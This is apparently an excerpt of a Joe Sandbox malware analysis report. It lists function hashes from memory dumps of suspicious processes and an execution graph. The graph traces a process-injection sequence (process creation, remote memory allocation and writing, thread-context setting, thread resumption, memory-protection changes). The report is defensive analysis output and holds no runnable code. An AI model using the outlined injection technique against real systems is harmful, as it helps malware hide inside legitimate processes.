                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 266e876b8e3ce69135124284698666f0a4a6a0c5dd56d34b43898a0935bf23e0
                                                                  • Instruction ID: e393e2d61977b3c170ed393a66232691cf4d9c64b1660da1e6552176fed75c4d
                                                                  • Opcode Fuzzy Hash: 266e876b8e3ce69135124284698666f0a4a6a0c5dd56d34b43898a0935bf23e0
                                                                  • Instruction Fuzzy Hash: 1AC09BA359010147C3D09E04CC41BA5A318D761704F58D5959405CE352EB37D5039750
                                                                  Function 066119B0 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 36dab506c50c0a488db30929bf2bc14785f07407c180155d4d14717ba1654835
                                                                  • Instruction ID: 1a70f60cf2778fd2398a7d13c9f61a1d162967b058fdff4edc3fd8c3ecd01d69
                                                                  • Opcode Fuzzy Hash: 36dab506c50c0a488db30929bf2bc14785f07407c180155d4d14717ba1654835
                                                                  • Instruction Fuzzy Hash: 98C04C7E3810119FC7069500CC81B9DA2619B84215F1DC1765408CBBC3CB2ED40B8981
                                                                  Function 0114176C Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71818661427.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_1140000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e71036a04723b08792e47daf443fb8035898e4e4513b919a406de20225a6ddb
                                                                  • Instruction ID: cd4e7f43056483bf260342d98c77765e58eefdf5d8a6a614229516e42efd167e
                                                                  • Opcode Fuzzy Hash: 5e71036a04723b08792e47daf443fb8035898e4e4513b919a406de20225a6ddb
                                                                  • Instruction Fuzzy Hash: B5C080301043109FEF157774B01F17C3BD2FB52B04B41444CD7C14F557D66A18048715
                                                                  Function 0114361E Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71818661427.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_1140000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e47e3920e800d347a4304e5ea2631ab3d27463d9acdf36723e0543ad97528d4b
                                                                  • Instruction ID: 3982c6b0e3b2f816a03b8ef88422385cffe4bafc039b3d863e02763af4f189e8
                                                                  • Opcode Fuzzy Hash: e47e3920e800d347a4304e5ea2631ab3d27463d9acdf36723e0543ad97528d4b
                                                                  • Instruction Fuzzy Hash: 59C01234A00004ABDB0A9BA0E8145ADBEB2EB89200F605118F64263260CA275C148B22
                                                                  Function 06619970 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9376b6be000c2253334dd5e47be0eff924b845268f1a370db7ca7423f382c9a8
                                                                  • Instruction ID: 78fbb8fcf3ea608a87f2adc5ad5145edd8c914a30543fffc416373df0d50deb6
                                                                  • Opcode Fuzzy Hash: 9376b6be000c2253334dd5e47be0eff924b845268f1a370db7ca7423f382c9a8
                                                                  • Instruction Fuzzy Hash: 6CC08CE040E3845FC352CB30CC214207F612B5312430640EEC864CA0A3DB401866C741
                                                                  Function 06612110 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4930a70662f9a207c0998053df36ec241ddcc713677a411ae28b662c9f0af4ac
                                                                  • Instruction ID: e2aeaff683d183d39e37f43dd732af36de20bfc64f3af892a85d779bfa741e47
                                                                  • Opcode Fuzzy Hash: 4930a70662f9a207c0998053df36ec241ddcc713677a411ae28b662c9f0af4ac
                                                                  • Instruction Fuzzy Hash: 6EC09B757415404FE7048B54CC71B51B750DB6A235F1DC5D49864CF3EAD727D8038740
                                                                  Function 01141700 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71818661427.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_1140000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b59594216a1b33c468023a7af8a32aa391f27ef102971c1f3af44f2955a32ba
                                                                  • Instruction ID: c81f02bc995182b15b0763095380a2a3e1e09d1e286ad6e26ca1b3478e370195
                                                                  • Opcode Fuzzy Hash: 8b59594216a1b33c468023a7af8a32aa391f27ef102971c1f3af44f2955a32ba
                                                                  • Instruction Fuzzy Hash: 2AA01232000308CB861027A0BC0E10C772CE608101F404014E04D418055A2A14004740
                                                                  Function 066117C0 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Function 06619CA0 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Function 06619C9E Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9e69e8215cc069b083c2ab6c554304b768326b6e22f31018d6695440f70614d
                                                                  • Instruction ID: b5a0aaa34baa823d52a8028d69bf684671358ceecf9c1fd13c959c580b510c12
                                                                  • Opcode Fuzzy Hash: d9e69e8215cc069b083c2ab6c554304b768326b6e22f31018d6695440f70614d
                                                                  • Instruction Fuzzy Hash: 41A012B01011019BC280C660C541400B6907A811103108058902881040CB115922D640
                                                                  Function 06611360 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Function 06611300 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Function 0661A020 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                  Function 01140960 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71818661427.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_1140000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 226dfddb88e580357331a6bd99bc52a0cada6d859946037d85a2c2a4e26d0095
                                                                  • Instruction ID: fb61539030f285eab58ad038e465ba03120c9b8c9966378b7a7bdacdaf3a9321
                                                                  • Opcode Fuzzy Hash: 226dfddb88e580357331a6bd99bc52a0cada6d859946037d85a2c2a4e26d0095
                                                                  • Instruction Fuzzy Hash: A190023104460C8B459027D5784A656B79C95845157819055AA4D819065E6A641086D5
                                                                  Function 06611F30 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                  Function 06618FF0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.71833769284.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                                  Execution Graph

                                                                  Execution Coverage:11.8%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:219
                                                                  Total number of Limit Nodes:6
                                                                  execution_graph 52010 6d7c990 52011 6d7c9a5 52010->52011 52014 6d7cb11 52011->52014 52015 6d7cb30 52014->52015 52016 6d7c9bb 52015->52016 52017 6d7d780 VirtualProtect 52015->52017 52018 6d7d788 VirtualProtect 52015->52018 52017->52015 52018->52015 52299 6bafec0 52300 6bafec5 NtProtectVirtualMemory 52299->52300 52302 6baff58 52300->52302 52019 5db6830 52020 5db6845 52019->52020 52021 5db685b 52020->52021 52023 5db6f84 52020->52023 52024 5db6f8e 52023->52024 52028 5db8180 52024->52028 52034 5db8170 52024->52034 52029 5db8195 52028->52029 52040 5db84f7 52029->52040 52045 5db8732 52029->52045 52055 5db8717 52029->52055 52035 5db8195 52034->52035 52037 5db8732 10 API calls 52035->52037 52038 5db84f7 10 API calls 52035->52038 52039 5db8717 10 API calls 52035->52039 52036 5db6cd5 52036->52021 52037->52036 52038->52036 52039->52036 52041 5db8501 52040->52041 52060 5db8b59 52041->52060 52076 5db8b68 52041->52076 52042 5db875e 52046 5db8738 52045->52046 52047 5db873a 52046->52047 52048 5db8746 52046->52048 52053 5db8b59 10 API calls 52047->52053 52054 5db8b68 10 API calls 52047->52054 52051 5db8b59 10 API calls 52048->52051 52052 5db8b68 10 API calls 52048->52052 52049 5db8759 52050 5db875e 52051->52049 52052->52049 52053->52050 52054->52050 52056 5db872b 52055->52056 52058 5db8b59 10 API calls 52056->52058 52059 5db8b68 10 API calls 52056->52059 52057 5db875e 52058->52057 52059->52057 52061 5db8b7d 52060->52061 52062 5db8b9f 52061->52062 52092 5db9379 52061->52092 52097 5db9cfb 52061->52097 52102 5db96c4 52061->52102 52107 5db9165 52061->52107 52112 5db9246 52061->52112 52119 5db9563 52061->52119 52124 5db9b6c 52061->52124 52129 5db91ca 52061->52129 52134 5db922b 52061->52134 52139 5db9db2 52061->52139 52144 5db9ff2 52061->52144 52149 5db949e 52061->52149 52154 5db9959 52061->52154 52062->52042 52077 5db8b7d 52076->52077 52078 5db8b9f 52077->52078 52079 5db9cfb 4 API calls 52077->52079 52080 5db9379 2 API calls 52077->52080 52081 5db9959 2 API calls 52077->52081 52082 5db949e 2 API calls 52077->52082 52083 5db9ff2 2 API calls 52077->52083 52084 5db9db2 2 API calls 52077->52084 52085 5db922b 2 API calls 52077->52085 52086 5db91ca 2 API calls 52077->52086 52087 5db9b6c 2 API calls 52077->52087 52088 5db9563 2 API calls 52077->52088 52089 5db9246 2 API calls 52077->52089 52090 5db9165 2 API calls 52077->52090 52091 5db96c4 2 API calls 52077->52091 52078->52042 52079->52078 52080->52078 52081->52078 52082->52078 52083->52078 52084->52078 52085->52078 52086->52078 52087->52078 52088->52078 52089->52078 52090->52078 52091->52078 52093 5db9383 52092->52093 52159 6d631d8 52093->52159 52163 6d631d0 52093->52163 52094 5db903b 52098 5db9d13 52097->52098 52167 5dba843 52098->52167 52174 5dba850 52098->52174 52099 5db9d2b 52103 5db96d3 52102->52103 52105 6d61e71 WriteProcessMemory 52103->52105 52106 6d61e78 WriteProcessMemory 52103->52106 52104 5db903b 52104->52062 52105->52104 52106->52104 52109 5db9174 52107->52109 52108 5db903b 52230 6d62580 52109->52230 52234 6d62588 52109->52234 52113 5db91eb 52112->52113 52116 5db903b 52112->52116 52114 5db924d 52113->52114 52117 6d62580 Wow64SetThreadContext 52113->52117 52118 6d62588 Wow64SetThreadContext 52113->52118 52115 5db9205 52115->52062 52117->52115 52118->52115 52120 5db9569 52119->52120 52122 6d61e71 WriteProcessMemory 52120->52122 52123 6d61e78 WriteProcessMemory 52120->52123 52121 5db9618 52121->52062 52122->52121 52123->52121 52125 5db9b76 52124->52125 52238 6d62b8b 52125->52238 52242 6d62b90 52125->52242 52126 5db903b 52130 5db91d9 52129->52130 52132 6d62580 Wow64SetThreadContext 52130->52132 52133 6d62588 Wow64SetThreadContext 52130->52133 52131 5db9205 52131->52062 52132->52131 52133->52131 52135 5dba085 52134->52135 52136 5db903b 52134->52136 52137 6d62b90 VirtualAllocEx 52135->52137 52138 6d62b8b VirtualAllocEx 52135->52138 52137->52136 52138->52136 52140 5db9dc1 52139->52140 52142 6d61e71 WriteProcessMemory 52140->52142 52143 6d61e78 WriteProcessMemory 52140->52143 52141 5db903b 52142->52141 52143->52141 52145 5db903b 52144->52145 52146 5db9379 52144->52146 52147 6d631d0 NtResumeThread 52146->52147 52148 6d631d8 NtResumeThread 52146->52148 52147->52145 52148->52145 52150 5dba0ab 52149->52150 52152 6d62b90 VirtualAllocEx 52150->52152 52153 6d62b8b VirtualAllocEx 52150->52153 52151 5db903b 52152->52151 52153->52151 52155 5db9961 52154->52155 52157 6d62b90 VirtualAllocEx 52155->52157 52158 6d62b8b VirtualAllocEx 52155->52158 52156 5db99d9 52157->52156 52158->52156 52160 6d631dd NtResumeThread 52159->52160 52162 6d63255 52160->52162 52162->52094 52164 6d631d8 NtResumeThread 52163->52164 52166 6d63255 52164->52166 52166->52094 52168 5dba850 52167->52168 52169 5dba889 52168->52169 52181 5dbb629 52168->52181 52186 5dbb216 52168->52186 52191 5dbae37 52168->52191 52196 5dbaeb0 52168->52196 52169->52099 52175 5dba867 52174->52175 52176 5dba889 52175->52176 52177 5dbb629 2 API calls 52175->52177 52178 5dbaeb0 2 API calls 52175->52178 52179 5dbae37 2 API calls 52175->52179 52180 5dbb216 2 API calls 52175->52180 52176->52099 52177->52176 52178->52176 52179->52176 52180->52176 52182 5dbad14 52181->52182 52183 5dbb23c 52181->52183 52183->52181 52201 6d60d58 52183->52201 52205 6d60d68 52183->52205 52187 5dbb220 52186->52187 52188 5dbad14 52187->52188 52189 6d60d58 2 API calls 52187->52189 52190 6d60d68 2 API calls 52187->52190 52189->52187 52190->52187 52192 5dbae46 52191->52192 52222 6d6097d 52192->52222 52226 6d60988 52192->52226 52197 5dbaed8 52196->52197 52199 6d6097d CreateProcessA 52197->52199 52200 6d60988 CreateProcessA 52197->52200 52198 5dbb30a 52199->52198 52200->52198 52202 6d60d68 52201->52202 52209 6d61437 52202->52209 52206 6d60d6d 52205->52206 52208 6d61437 2 API calls 52206->52208 52207 6d60d93 52207->52183 52208->52207 52210 6d61446 52209->52210 52214 6d61e71 52210->52214 52218 6d61e78 52210->52218 52211 6d60d93 52211->52183 52215 6d61e78 WriteProcessMemory 52214->52215 52217 6d61f17 52215->52217 52217->52211 52219 6d61e7d WriteProcessMemory 52218->52219 52221 6d61f17 52219->52221 52221->52211 52223 6d60988 CreateProcessA 52222->52223 52225 6d60b74 52223->52225 52227 6d6098d CreateProcessA 52226->52227 52229 6d60b74 52227->52229 52231 6d62588 Wow64SetThreadContext 52230->52231 52233 6d62615 52231->52233 52233->52108 52235 6d6258d Wow64SetThreadContext 52234->52235 52237 6d62615 52235->52237 52237->52108 52239 6d62bd0 VirtualAllocEx 52238->52239 52241 6d62c0d 52239->52241 52241->52126 52243 6d62bd0 VirtualAllocEx 52242->52243 52245 6d62c0d 52243->52245 52245->52126 52246 13423d8 52247 13423f2 52246->52247 52248 1342402 52247->52248 52252 1343894 52247->52252 52255 134a569 52247->52255 52260 1344f16 52247->52260 52264 134fdb8 52252->52264 52256 134b715 52255->52256 52277 6b41198 52256->52277 52281 6b41189 52256->52281 52257 1343010 52261 1344f35 52260->52261 52263 134fdb8 2 API calls 52261->52263 52262 1343010 52263->52262 52266 134fddf 52264->52266 52265 13438b2 52265->52248 52269 6b40301 52266->52269 52273 6b40308 52266->52273 52270 6b40308 VirtualProtect 52269->52270 52272 6b4038b 52270->52272 52272->52265 52274 6b40350 VirtualProtect 52273->52274 52276 6b4038b 52274->52276 52276->52265 52278 6b411ad 52277->52278 52286 6b411d9 52278->52286 52282 6b41196 52281->52282 52283 6b41144 52281->52283 52285 6b411d9 2 API calls 52282->52285 52283->52257 52284 6b411c5 52284->52257 52285->52284 52287 6b4120f 52286->52287 52291 6b412f0 52287->52291 52295 6b412e8 52287->52295 52288 6b411c5 52288->52257 52292 6b41330 VirtualAlloc 52291->52292 52294 6b4136a 52292->52294 52294->52288 52296 6b412f0 VirtualAlloc 52295->52296 52298 6b4136a 52296->52298 52298->52288

                                                                  Executed Functions

                                                                  Function 05DBC9B8 Relevance: 1.9, Strings: 1, Instructions: 615COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 750 5dbc9b8-5dbc9d9 751 5dbc9db 750->751 752 5dbc9e0-5dbcab3 call 5dbd508 750->752 751->752 759 5dbcac2 752->759 760 5dbcab5-5dbcac0 752->760 761 5dbcacc-5dbcbe7 759->761 760->761 772 5dbcbf9-5dbcc24 761->772 773 5dbcbe9-5dbcbef 761->773 774 5dbd3ec-5dbd408 772->774 773->772 775 5dbcc29-5dbcd8c call 5dbb8d0 774->775 776 5dbd40e-5dbd429 774->776 787 5dbcd9e-5dbcf2f call 5db8a10 call 5db88e8 775->787 788 5dbcd8e-5dbcd94 775->788 800 5dbcf31-5dbcf35 787->800 801 5dbcf94-5dbcf9e 787->801 788->787 803 5dbcf3d-5dbcf8f 800->803 804 5dbcf37-5dbcf38 800->804 802 5dbd1c5-5dbd1e4 801->802 806 5dbd1ea-5dbd214 802->806 807 5dbcfa3-5dbd0e9 call 5dbb8d0 802->807 805 5dbd26a-5dbd2d5 803->805 804->805 824 5dbd2e7-5dbd332 805->824 825 5dbd2d7-5dbd2dd 805->825 813 5dbd267-5dbd268 806->813 814 5dbd216-5dbd264 806->814 836 5dbd0ef-5dbd1bb call 5dbb8d0 807->836 837 5dbd1be-5dbd1bf 807->837 813->805 814->813 826 5dbd338-5dbd3b2 824->826 827 5dbd3d1-5dbd3e9 824->827 825->824 838 5dbd3be-5dbd3d0 826->838 827->774 836->837 837->802 838->827
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8
                                                                  • API String ID: 0-4194326291
                                                                  • Opcode ID: 4a750822c09046c975b5d693bb2402edc8f084e0efec94036a591dfd9525f86c
                                                                  • Instruction ID: 1a56e851cd6ef5543f11f9b81e0fb1d5692f8a0864eabf7692412f3f30baae07
                                                                  • Opcode Fuzzy Hash: 4a750822c09046c975b5d693bb2402edc8f084e0efec94036a591dfd9525f86c
                                                                  • Instruction Fuzzy Hash: 6A52C675E00229CFDB64DF69C850AD9B7B6FB89300F50869AD44DA7354DB70AE81CF90
                                                                  Function 06BAFEB8 Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1263 6bafeb8-6bafebe 1264 6bafec0-6bafec4 1263->1264 1265 6bafec5-6baff56 NtProtectVirtualMemory 1263->1265 1264->1265 1268 6baff58-6baff5e 1265->1268 1269 6baff5f-6baff84 1265->1269 1268->1269
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06BAFF49
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725421654.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6ba0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: 5816f75899d49ea645bf2b9de22934bbc1a6617a7c9a8f122cd5f176f6324b77
                                                                  • Instruction ID: 6d26afb35c80a816a5ffc4feb347397730cc7e062a73344e501ee9de28826faf
                                                                  • Opcode Fuzzy Hash: 5816f75899d49ea645bf2b9de22934bbc1a6617a7c9a8f122cd5f176f6324b77
                                                                  • Instruction Fuzzy Hash: 1321E2B1D013499FDB10DFAAD884AEEFBF9BF48310F60842AE519A7240D7759945CBA0
                                                                  Function 06BAFEC0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1296 6bafec0-6baff56 NtProtectVirtualMemory 1300 6baff58-6baff5e 1296->1300 1301 6baff5f-6baff84 1296->1301 1300->1301
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06BAFF49
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725421654.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6ba0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: 3f321f481748ce930537a165ee9145e96e146cf225b152038ee78d6ebb93b8cb
                                                                  • Instruction ID: bdcdcc9d7bb4fccc690c2252f4e7a49622983ad3f4ac0905813171927060f974
                                                                  • Opcode Fuzzy Hash: 3f321f481748ce930537a165ee9145e96e146cf225b152038ee78d6ebb93b8cb
                                                                  • Instruction Fuzzy Hash: AC21F2B1D013499FDB10DFAAD884AEEFBF5FF48310F60842AE519A7240C7759945CBA0
                                                                  Function 06D631D0 Relevance: 1.6, APIs: 1, Instructions: 59nativethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 06D63246
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: f2bae044b9f1598274ba1f9cc67a8a9ede992f333403f0795a392fc3d51100d9
                                                                  • Instruction ID: de0fb402f7a92229f7ca4257892d099130558f922f6f91ea4a13245228ac59a4
                                                                  • Opcode Fuzzy Hash: f2bae044b9f1598274ba1f9cc67a8a9ede992f333403f0795a392fc3d51100d9
                                                                  • Instruction Fuzzy Hash: 9A2136B1D00309CFDB10DFAAD48479EFBF8BF89224F60842AD519A7200D7799945CFA0
                                                                  Function 06D631D8 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 06D63246
                                                                  Memory Dump Source
